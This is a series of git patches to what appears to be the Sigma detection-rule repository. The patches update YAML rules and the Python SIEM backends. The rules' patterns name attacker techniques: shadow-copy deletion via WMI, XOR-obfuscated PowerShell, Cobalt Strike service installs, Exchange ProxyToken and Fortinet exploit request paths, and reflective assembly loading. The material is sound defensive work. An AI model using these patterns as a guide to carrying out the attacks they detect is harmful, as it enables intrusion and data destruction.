'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe' condition: selection and not filter \ No newline at end of file diff --git a/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml b/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml index 456b0b2d..a496ed90 100644 --- a/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml +++ b/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml @@ -11,26 +11,25 @@ tags: status: experimental author: frack113 date: 2021/06/03 -modified: 2021/08/03 +modified: 2021/08/28 logsource: product: windows service: powershell-classic definition: fields have to be extract from event detection: selection_obj: - CommandLine|contains|all: + HostApplication|contains|all: - 'Get-WmiObject' - ' Win32_Shadowcopy' selection_del: - CommandLine|contains: + HostApplication|contains: - 'Delete()' - 'Remove-WmiObject' selection_eventid: EventID: 400 condition: selection_obj and selection_del and selection_eventid fields: - - CommandLine - - ParentCommandLine + - HostApplication falsepositives: - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason level: critical From 68237dffc4b3d04a466d0bd5a9562fd8bf7f8767 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 28 Aug 2021 08:18:47 +0200 Subject: [PATCH 0615/1367] fix HostApplication --- rules/windows/powershell/powershell_xor_commandline.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_xor_commandline.yml b/rules/windows/powershell/powershell_xor_commandline.yml index 74905593..f4fc893d 100644 --- a/rules/windows/powershell/powershell_xor_commandline.yml +++ b/rules/windows/powershell/powershell_xor_commandline.yml @@ -4,6 +4,7 @@ description: Detects suspicious powershell process which includes bxor command, status: experimental author: Teymur Kheirkhabarov, Harish Segar (rule) date: 2020/06/29 +modified: 2021/08/28 tags: - attack.execution - attack.t1059.001 @@ -17,7 +18,7 @@ detection: EventID: 400 HostName: "ConsoleHost" filter: - CommandLine|contains: + HostApplication|contains: - "bxor" - "join" - "char" From 6aae623f4587d4f23c7b8a188a9c4566f374b748 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 28 Aug 2021 08:42:02 +0200 Subject: [PATCH 0616/1367] Remove duplicate file --- tools/config/powershell-windows-all.yml | 91 ------------------------- 1 file changed, 91 deletions(-) delete mode 100644 tools/config/powershell-windows-all.yml diff --git a/tools/config/powershell-windows-all.yml b/tools/config/powershell-windows-all.yml deleted file mode 100644 index a32dd3f8..00000000 --- a/tools/config/powershell-windows-all.yml +++ /dev/null @@ -1,91 +0,0 @@ -logsources: - windows-application: - product: windows - service: application - conditions: - LogName: 'Application' - windows-security: - product: windows - service: security - conditions: - LogName: 'Security' - windows-system: - product: windows - service: system - conditions: - LogName: 'System' - windows-sysmon: - product: windows - service: sysmon - conditions: - LogName: 'Microsoft-Windows-Sysmon/Operational' - windows-powershell: - product: windows - service: powershell - conditions: - LogName: 'Microsoft-Windows-PowerShell/Operational' - windows-classicpowershell: - product: windows - service: powershell-classic - conditions: - LogName: 'Windows PowerShell' - windows-taskscheduler: - product: windows - service: taskscheduler - conditions: - LogName: 'Microsoft-Windows-TaskScheduler/Operational' - windows-wmi: - product: windows - service: wmi - conditions: - LogName: 'Microsoft-Windows-WMI-Activity/Operational' - windows-dns-server: - product: windows - service: dns-server - category: dns - conditions: - LogName: 'DNS Server' - windows-dns-server-audit: - product: windows - service: dns-server-audit - conditions: - LogName: 'Microsoft-Windows-DNS-Server/Audit' - windows-driver-framework: - product: windows - service: driver-framework - conditions: - LogName: 'Microsoft-Windows-DriverFrameworks-UserMode/Operational' - windows-ntlm: - product: windows - service: ntlm - conditions: - LogName: 'Microsoft-Windows-NTLM/Operational' - windows-applocker: - product: windows - service: applocker - conditions: - LogName: - - 'Microsoft-Windows-AppLocker/MSI and Script' - - 'Microsoft-Windows-AppLocker/EXE and DLL' - - 'Microsoft-Windows-AppLocker/Packaged app-Deployment' - - 'Microsoft-Windows-AppLocker/Packaged app-Execution' - windows-msexchange-management: - product: windows - service: msexchange-management - conditions: - LogName: 'MSExchange Management' - windows-printservice-admin: - product: windows - service: printservice-admin - conditions: - LogName: 'Microsoft-Windows-PrintService/Admin' - windows-printservice-operational: - product: windows - service: printservice-operational - conditions: - LogName: 'Microsoft-Windows-PrintService/Operational' - windows-smbclient-security: - product: windows - service: smbclient-security - conditions: - LogName: 'Microsoft-Windows-SmbClient/Security' \ No newline at end of file From 5f1143247b6cf6fba64d5bfa114e5545b9aff02a Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 28 Aug 2021 08:51:58 +0200 Subject: [PATCH 0617/1367] Update "sigmac -l" message --- tools/sigma/backends/ee-outliers.py | 2 +- tools/sigma/backends/elasticsearch.py | 10 ++++++---- tools/sigma/backends/lacework.py | 4 +--- tools/sigma/backends/sysmon.py | 1 + 4 files changed, 9 insertions(+), 8 deletions(-) diff --git a/tools/sigma/backends/ee-outliers.py b/tools/sigma/backends/ee-outliers.py index 4a912d11..8904bdd7 100644 --- a/tools/sigma/backends/ee-outliers.py +++ b/tools/sigma/backends/ee-outliers.py @@ -23,7 +23,7 @@ from io import StringIO class OutliersBackend(ElasticsearchDSLBackend, MultiRuleOutputMixin): - """ee-outliers backend""" + """Converts Sigma rule into ee-outliers""" identifier = 'ee-outliers' active = True diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 76620993..480c56a1 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -387,7 +387,7 @@ class ElasticsearchQuerystringBackendLogRhythm(DeepFieldMappingMixin, Elasticsea return super().generateSubexpressionNode(node) class ElasticsearchEQLBackend(DeepFieldMappingMixin, ElasticsearchWildcardHandlingMixin, SingleTextQueryBackend): - """Converts Sigma rule into EQL.""" + """Converts Sigma rule into Elasticsearch EQL query.""" identifier = "es-eql" active = True @@ -501,7 +501,7 @@ class ElasticsearchEQLBackend(DeepFieldMappingMixin, ElasticsearchWildcardHandli return fieldname class ElasticsearchDSLBackend(DeepFieldMappingMixin, RulenameCommentMixin, ElasticsearchWildcardHandlingMixin, BaseBackend): - """ElasticSearch DSL backend""" + """Converts Sigma rule into Elasticsearch DSL query""" identifier = 'es-dsl' active = True options = RulenameCommentMixin.options + ElasticsearchWildcardHandlingMixin.options + ( @@ -1397,7 +1397,7 @@ class ElastalertBackend(DeepFieldMappingMixin, MultiRuleOutputMixin): # return result class ElastalertBackendDsl(ElastalertBackend, ElasticsearchDSLBackend): - """Elastalert backend""" + """Converts Sigma rule into ElastAlert DSL query""" identifier = 'elastalert-dsl' def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) @@ -1410,7 +1410,7 @@ class ElastalertBackendDsl(ElastalertBackend, ElasticsearchDSLBackend): return self.queries class ElastalertBackendQs(ElastalertBackend, ElasticsearchQuerystringBackend): - """Elastalert backend""" + """Converts Sigma rule into ElastAlert QS query""" identifier = 'elastalert' def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) @@ -1656,12 +1656,14 @@ class ElasticSearchRuleBackend(object): class ElasticSearchRuleEqlBackend(ElasticSearchRuleBackend, ElasticsearchEQLBackend): + """Converts Sigma rule into Elastic SIEM EQL query""" default_rule_type = "eql" identifier = "es-rule-eql" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) class ElasticSearchRuleQsBackend(ElasticSearchRuleBackend, ElasticsearchQuerystringBackend): + """Converts Sigma rule into Elastic SIEM lucene query""" identifier = "es-rule" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py index 2f567088..d28c3053 100644 --- a/tools/sigma/backends/lacework.py +++ b/tools/sigma/backends/lacework.py @@ -102,9 +102,7 @@ yaml.add_representer(str, str_presenter) class LaceworkBackend(SingleTextQueryBackend): - """ - Converts Sigma rule into Lacework Policy Platform - """ + """Converts Sigma rule into Lacework Policy Platform""" identifier = "lacework" active = True # our approach to config will be such that we support both an diff --git a/tools/sigma/backends/sysmon.py b/tools/sigma/backends/sysmon.py index 96302181..ce1524e6 100644 --- a/tools/sigma/backends/sysmon.py +++ b/tools/sigma/backends/sysmon.py @@ -8,6 +8,7 @@ from .exceptions import NotSupportedError class SysmonConfigBackend(SingleTextQueryBackend, MultiRuleOutputMixin): + """Converts Sigma rule into sysmon XML configuration""" identifier = "sysmon" active = True andToken = " AND " From 4c414b2e8bb8d9f0eb87755cfc958d30f80b128b Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 29 Aug 2021 08:52:54 +0200 Subject: [PATCH 0618/1367] fix Base backend doesn't support multiple conditions (33) --- .../win_susp_failed_logons_single_source.yml | 23 +++++++++++-------- 1 file changed, 13 insertions(+), 10 deletions(-) diff --git a/rules/windows/builtin/win_susp_failed_logons_single_source.yml b/rules/windows/builtin/win_susp_failed_logons_single_source.yml index ab3caa80..cf0ce27f 100644 --- a/rules/windows/builtin/win_susp_failed_logons_single_source.yml +++ b/rules/windows/builtin/win_susp_failed_logons_single_source.yml @@ -1,9 +1,10 @@ +action: global title: Failed Logins with Different Accounts from Single Source System id: e98374a6-e2d9-4076-9b5c-11bdb2569995 description: Detects suspicious failed logins with different user accounts from a single source system author: Florian Roth date: 2017/01/10 -modified: 2021/07/07 +modified: 2021/08/29 tags: - attack.persistence - attack.privilege_escalation @@ -11,6 +12,13 @@ tags: logsource: product: windows service: security +falsepositives: + - Terminal servers + - Jump servers + - Other multiuser systems like Citrix server farms + - Workstations with frequently changing users +level: medium +--- detection: selection1: EventID: @@ -18,17 +26,12 @@ detection: - 4625 TargetUserName: '*' WorkstationName: '*' + condition: selection1 | count(TargetUserName) by WorkstationName > 3 +--- +detection: selection2: EventID: 4776 TargetUserName: '*' Workstation: '*' timeframe: 24h - condition: - - selection1 | count(TargetUserName) by WorkstationName > 3 - - selection2 | count(TargetUserName) by Workstation > 3 -falsepositives: - - Terminal servers - - Jump servers - - Other multiuser systems like Citrix server farms - - Workstations with frequently changing users -level: medium \ No newline at end of file + condition: selection2 | count(TargetUserName) by Workstation > 3 From 718b44c38af6062b9b140da04f6565b757690eb7 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 29 Aug 2021 08:57:25 +0200 Subject: [PATCH 0619/1367] fix List values must be strings or numbers (46) --- rules/web/web_fortinet_cve_2021_22123_exploit.yml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/rules/web/web_fortinet_cve_2021_22123_exploit.yml b/rules/web/web_fortinet_cve_2021_22123_exploit.yml index f50aa501..2f7439b7 100644 --- a/rules/web/web_fortinet_cve_2021_22123_exploit.yml +++ b/rules/web/web_fortinet_cve_2021_22123_exploit.yml @@ -6,6 +6,7 @@ references: - https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection author: Bhabesh Raj, Florian Roth date: 2021/08/19 +modified: 2021/08/29 tags: - attack.initial_access - attack.t1190 @@ -13,15 +14,12 @@ logsource: category: webserver detection: selection: - c-uri|contains: - - '/api/v2.0/user/remoteserver.saml' - cs-method: - - POST + c-uri|contains: '/api/v2.0/user/remoteserver.saml' + cs-method: POST filter1: cs-referer|contains: '/root/user/remote-user/saml-user/' filter2: - cs-referer: - - null + cs-referer: null condition: selection and not filter1 and not filter2 fields: - client_ip From 5ad29cf0c289c05b40be840e27c489dedbca6c20 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 29 Aug 2021 09:03:50 +0200 Subject: [PATCH 0620/1367] fix Base backend doesn't support multiple conditions (29) --- rules/network/net_susp_network_scan.yml | 22 ++++++++++++++-------- 1 file changed, 14 insertions(+), 8 deletions(-) diff --git a/rules/network/net_susp_network_scan.yml b/rules/network/net_susp_network_scan.yml index 2fdbdbe3..ae8770e6 100644 --- a/rules/network/net_susp_network_scan.yml +++ b/rules/network/net_susp_network_scan.yml @@ -1,3 +1,4 @@ +action: global title: Network Scans id: fab0ddf0-b8a9-4d70-91ce-a20547209afb status: experimental @@ -7,13 +8,6 @@ date: 2017/02/19 modified: 2020/08/27 logsource: category: firewall -detection: - selection: - action: denied - timeframe: 24h - condition: - - selection | count(dst_port) by src_ip > 10 - - selection | count(dst_ip) by src_ip > 10 fields: - src_ip - dst_ip @@ -25,4 +19,16 @@ falsepositives: level: medium tags: - attack.discovery - - attack.t1046 \ No newline at end of file + - attack.t1046 +--- +detection: + selection: + action: denied + timeframe: 24h + condition: selection | count(dst_port) by src_ip > 10 +--- +detection: + selection: + action: denied + timeframe: 24h + condition: selection | count(dst_ip) by src_ip > 10 \ No newline at end of file From 772fe06e1017994c1ec6ee227beb70bba33ebc2b Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 29 Aug 2021 09:10:30 +0200 Subject: [PATCH 0621/1367] fix Backend does not support map values of type (57) --- rules/cloud/gworkspace/gworkspace_mfa_disabled.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml b/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml index 3730e5c1..ec179898 100644 --- a/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml +++ b/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml @@ -4,6 +4,7 @@ description: Detects when multi-factor authentication (MFA) is disabled. author: Austin Songer status: experimental date: 2021/08/26 +modified: 2021/08/29 references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION @@ -17,7 +18,7 @@ detection: - ENFORCE_STRONG_AUTHENTICATION - ALLOW_STRONG_AUTHENTICATION eventValue: - new_value: false + new_value: 'false' condition: all of them level: medium tags: From 83e2f3640c602da2bfe468ed64ad3280b92aa334 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 29 Aug 2021 09:24:43 +0200 Subject: [PATCH 0622/1367] add lacework backend --- Makefile | 1 + 1 file changed, 1 insertion(+) diff --git a/Makefile b/Makefile index ea442b75..6f5327a2 100644 --- a/Makefile +++ b/Makefile @@ -48,6 +48,7 @@ test-sigmac: $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t splunkxml -c tools/config/splunk-windows.yml rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t splunkdm -c tools/config/splunk-windows.yml rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t logpoint -c tools/config/logpoint-windows.yml rules/ > /dev/null + $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t lacework rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t mdatp rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala-rule rules/ > /dev/null From 2e79998cc706e3c56ecfe97e4ac75b2798568f57 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 29 Aug 2021 11:47:47 +0200 Subject: [PATCH 0623/1367] add devo COVERAGE --- Makefile | 1 + 1 file changed, 1 insertion(+) diff --git a/Makefile b/Makefile index 6f5327a2..e4520443 100644 --- a/Makefile +++ b/Makefile @@ -48,6 +48,7 @@ test-sigmac: $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t splunkxml -c tools/config/splunk-windows.yml rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t splunkdm -c tools/config/splunk-windows.yml rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t logpoint -c tools/config/logpoint-windows.yml rules/ > /dev/null + $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t devo -c tools/config/devo-windows.yml rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t lacework rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t mdatp rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala rules/ > /dev/null From 8ad2c722d62fcec3a39e0ff253821f8aa8c8566d Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 29 Aug 2021 12:19:49 +0200 Subject: [PATCH 0624/1367] add uberagent COVERAGE --- Makefile | 1 + 1 file changed, 1 insertion(+) diff --git a/Makefile b/Makefile index e4520443..e8390afd 100644 --- a/Makefile +++ b/Makefile @@ -51,6 +51,7 @@ test-sigmac: $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t devo -c tools/config/devo-windows.yml rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t lacework rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t mdatp rules/ > /dev/null + $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t uberagent rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala-rule rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala --backend-config tests/backend_config.yml rules/windows/process_creation/ > /dev/null From 5f271bf33437527faac1e0b0c0fea428e94624d4 Mon Sep 17 00:00:00 2001 From: Nico <44952997+ncrqnt@users.noreply.github.com> Date: Mon, 30 Aug 2021 08:29:07 +0200 Subject: [PATCH 0625/1367] add author field to elastic rule --- tools/sigma/backends/elasticsearch.py | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 76620993..b84773d1 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -1622,7 +1622,17 @@ class ElasticSearchRuleBackend(object): else: references.append(add_ref_yml) + # add author filed depending on data type in rule file + author = configs.get("author", "") + if isinstance(author, str): + author_list = author.split(', ') + elif isinstance(author, list): + author_list = author + else: + author_list = [] + rule = { + "author": author_list, "description": configs.get("description", ""), "enabled": True, "false_positives": falsepositives, From 00dec96245c7313bcdb9e3a02c5b003db4f36ef9 Mon Sep 17 00:00:00 2001 From: Nico <44952997+ncrqnt@users.noreply.github.com> Date: Mon, 30 Aug 2021 08:45:21 +0200 Subject: [PATCH 0626/1367] Add support for subtechniques --- tools/sigma/backends/elasticsearch.py | 40 ++++++++++++++++++++++++++- 1 file changed, 39 insertions(+), 1 deletion(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index b84773d1..b4768874 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -1479,6 +1479,10 @@ class ElasticSearchRuleBackend(object): def create_threat_description(self, tactics_list, techniques_list): threat_list = list() + # sort lists for correct handling with subtechniques + tactics_list.sort(key=lambda x: x['external_id'], reverse=False) + techniques_list.sort(key=lambda x: x['technique_id'], reverse=False) + for tactic in tactics_list: temp_tactics = { "tactic": { @@ -1496,6 +1500,23 @@ class ElasticSearchRuleBackend(object): "name": tech.get("technique", ""), "reference": tech.get("url", "") }) + elif re.match('[T][0-9]{4}.[0-9]{3}', tech.get("technique_id", ""), re.IGNORECASE): + # add subtechnique to main technique + technique = tech.get("technique_id", "").split(".")[0] + technique_entry = list(filter(lambda temp_techniques: temp_techniques['id'] == technique, temp_techniques)) + + if technique_entry: + index = temp_techniques.index(technique_entry[0]) + temp_subtechniques = temp_techniques[index].get("subtechnique", []) + temp_subtechniques.append( + { + "id": tech.get("technique_id", ""), + "name": tech.get("technique", ""), + "reference": tech.get("url", "") + } + ) + temp_techniques[index].update({"subtechnique": temp_subtechniques}) + temp_tactics.update({"technique": temp_techniques}) threat_list.append(temp_tactics) return threat_list @@ -1559,8 +1580,20 @@ class ElasticSearchRuleBackend(object): technics_list = list() new_tags = list() + # sort tags so it looks nice :) + tags.sort() + for tag in tags: tag = tag.replace("attack.", "") + # if there's a subtechnique, add main technique to the list if not already there + if re.match("[t][0-9]{4}.[0-9]{3}", tag, re.IGNORECASE): + technique = tag.split('.')[0] + if technique not in tags and technique.title() not in new_tags: + tech = self.find_technique(technique.title()) + if tech: + new_tags.append(technique.title()) + technics_list.append(tech) + if re.match("[t][0-9]{4}", tag, re.IGNORECASE): tech = self.find_technique(tag.title()) if tech: @@ -1582,8 +1615,13 @@ class ElasticSearchRuleBackend(object): else: tact = self.find_tactics(key_name=tag.title()) if tact: - new_tags.append(tag.title()) tactics_list.append(tact) + + # capitalize if not a MITRE CAR tag + if re.match("car.\d{4}-\d{2}-\d{3}", tag, re.IGNORECASE): + new_tags.append(tag) + else: + new_tags.append(tag.title()) if self.custom_tag: if ',' in self.custom_tag: From 1ded4eb9134b40a0dcb032fe9354f228c711b9c7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 30 Aug 2021 15:10:30 +0200 Subject: [PATCH 0627/1367] rules: cobalt strike rules refactored --- .../windows/builtin/win_cobaltstrike_service_installs.yml | 7 +++++-- .../process_creation/win_cobaltstrike_process_patterns.yml | 6 ++++++ 2 files changed, 11 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/win_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_cobaltstrike_service_installs.yml index a52c5ed2..ce3b377b 100644 --- a/rules/windows/builtin/win_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/win_cobaltstrike_service_installs.yml @@ -5,8 +5,9 @@ author: Florian Roth, Wojciech Lesicki references: - https://www.sans.org/webcasts/119395 - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ + - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ date: 2021/05/26 -modified: 2021/08/09 +modified: 2021/08/30 tags: - attack.execution - attack.privilege_escalation @@ -19,7 +20,9 @@ logsource: service: system detection: selection_id: - EventID: 7045 + EventID: + - 7045 + - 4697 selection1: ServiceFileName|contains|all: - 'ADMIN$' diff --git a/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml b/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml index 0923753e..c36cf801 100644 --- a/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml +++ b/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml @@ -5,7 +5,9 @@ description: Detects process patterns found in Cobalt Strike beacon activity (se author: Florian Roth references: - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/ + - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ date: 2021/07/27 +modified: 2021/08/30 tags: - attack.execution logsource: @@ -27,6 +29,10 @@ detection: - '> \\.\pipe' - '\whoami.exe' ParentImage|endswith: '\dllhost.exe' + selection4: + Image|endswith: '\cmd.exe' + ParentImage|endswith: '\runonce.exe' + ParentCommandLine|endswith: '\runonce.exe' condition: 1 of them falsepositives: - Other programs that cause these patterns (please report) From 98de92ceaf75bf51ab3fff46d970bafe87843fd0 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 30 Aug 2021 15:17:53 +0200 Subject: [PATCH 0628/1367] refactor: global rule match on system and security --- .../win_cobaltstrike_service_installs.yml | 23 ++++++++++++------- 1 file changed, 15 insertions(+), 8 deletions(-) diff --git a/rules/windows/builtin/win_cobaltstrike_service_installs.yml b/rules/windows/builtin/win_cobaltstrike_service_installs.yml index ce3b377b..9f81e307 100644 --- a/rules/windows/builtin/win_cobaltstrike_service_installs.yml +++ b/rules/windows/builtin/win_cobaltstrike_service_installs.yml @@ -1,3 +1,4 @@ +action: global title: CobaltStrike Service Installations id: 5a105d34-05fc-401e-8553-272b45c1522d description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement @@ -7,7 +8,6 @@ references: - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ date: 2021/05/26 -modified: 2021/08/30 tags: - attack.execution - attack.privilege_escalation @@ -15,14 +15,7 @@ tags: - attack.t1021.002 - attack.t1543.003 - attack.t1569.002 -logsource: - product: windows - service: system detection: - selection_id: - EventID: - - 7045 - - 4697 selection1: ServiceFileName|contains|all: - 'ADMIN$' @@ -40,3 +33,17 @@ detection: falsepositives: - Unknown level: critical +--- +logsource: + product: windows + service: system +detection: + selection_id: + EventID: 7045 +--- +logsource: + product: windows + service: security +detection: + selection_id: + EventID: 4697 \ No newline at end of file From 4a4966af77583352cb05965a9a479124842e3da7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 30 Aug 2021 15:47:53 +0200 Subject: [PATCH 0629/1367] rule: ProxyToken CVE-2021-33766 Exchange --- ...b_cve_2021_33766_msexchange_proxytoken.yml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 rules/web/web_cve_2021_33766_msexchange_proxytoken.yml diff --git a/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml b/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml new file mode 100644 index 00000000..07570ee0 --- /dev/null +++ b/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml @@ -0,0 +1,31 @@ +title: CVE-2021-33766 Exchange ProxyToken Exploitation +id: 56973b50-3382-4b56-bdf5-f51a3183797a +status: experimental +description: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766 +author: Florian Roth +date: 2021/08/30 +references: + - https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection1: + cs-method: 'POST' + c-uri|contains|all: + - '/ecp/' + - '/RulesEditor/InboxRules.svc/NewObject' + sc-status: 500 + selection2: + c-uri|contains|all: + - 'SecurityToken=' + - '/ecp/' + condition: selection1 or selection2 +fields: + - c-ip + - c-dns +falsepositives: + - Unknown +level: critical From af9392ba0f3970a0ec0efef552b10ecdbad20200 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 30 Aug 2021 16:12:42 +0200 Subject: [PATCH 0630/1367] refactor: add 500 status code in selection2 to avoid FPs with exploitation attempts --- rules/web/web_cve_2021_33766_msexchange_proxytoken.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml b/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml index 07570ee0..ad016091 100644 --- a/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml +++ b/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml @@ -2,7 +2,7 @@ title: CVE-2021-33766 Exchange ProxyToken Exploitation id: 56973b50-3382-4b56-bdf5-f51a3183797a status: experimental description: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766 -author: Florian Roth +author: Florian Roth, Max Altgelt, Christian Burkard date: 2021/08/30 references: - https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server @@ -22,6 +22,7 @@ detection: c-uri|contains|all: - 'SecurityToken=' - '/ecp/' + sc-status: 500 condition: selection1 or selection2 fields: - c-ip From acf59f9795b6d1cfd61170b681777624d5f7205e Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 30 Aug 2021 19:49:44 +0200 Subject: [PATCH 0631/1367] Fix some errors --- .../powershell_suspicious_keywords.yml | 32 ++++++++++--------- .../powershell/powershell_wmimplant.yml | 2 ++ ...shell_wsman_com_provider_no_powershell.yml | 9 +++--- 3 files changed, 24 insertions(+), 19 deletions(-) diff --git a/rules/windows/powershell/powershell_suspicious_keywords.yml b/rules/windows/powershell/powershell_suspicious_keywords.yml index 35673048..17910236 100644 --- a/rules/windows/powershell/powershell_suspicious_keywords.yml +++ b/rules/windows/powershell/powershell_suspicious_keywords.yml @@ -3,7 +3,7 @@ id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf status: experimental description: Detects keywords that could indicate the use of some PowerShell exploitation framework date: 2019/02/11 -modified: 2021/08/18 +modified: 2021/08/30 author: Florian Roth, Perez Diego (@darkquassar) references: - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462 @@ -17,21 +17,23 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Script block logging must be enabled for 4104 detection: - keywords: - - "System.Reflection.Assembly.Load($" - - "[System.Reflection.Assembly]::Load($" - - "[Reflection.Assembly]::Load($" - - "System.Reflection.AssemblyName" - - "Reflection.Emit.AssemblyBuilderAccess" - - "Runtime.InteropServices.DllImportAttribute" - - "SuspendThread" - - "rundll32" - # - "FromBase64" - - "Invoke-WMIMethod" - - "http://127.0.0.1" - condition: keywords + framework: + EventID: 4104 + ScriptBlockText|contains: + - "System.Reflection.Assembly.Load($" + - "[System.Reflection.Assembly]::Load($" + - "[Reflection.Assembly]::Load($" + - "System.Reflection.AssemblyName" + - "Reflection.Emit.AssemblyBuilderAccess" + - "Runtime.InteropServices.DllImportAttribute" + - "SuspendThread" + - "rundll32" + # - "FromBase64" + - "Invoke-WMIMethod" + - "http://127.0.0.1" + condition: framework falsepositives: - Penetration tests level: high diff --git a/rules/windows/powershell/powershell_wmimplant.yml b/rules/windows/powershell/powershell_wmimplant.yml index ec0915ff..9ed475bd 100644 --- a/rules/windows/powershell/powershell_wmimplant.yml +++ b/rules/windows/powershell/powershell_wmimplant.yml @@ -11,12 +11,14 @@ tags: - attack.t1086 #an old one author: NVISO date: 2020/03/26 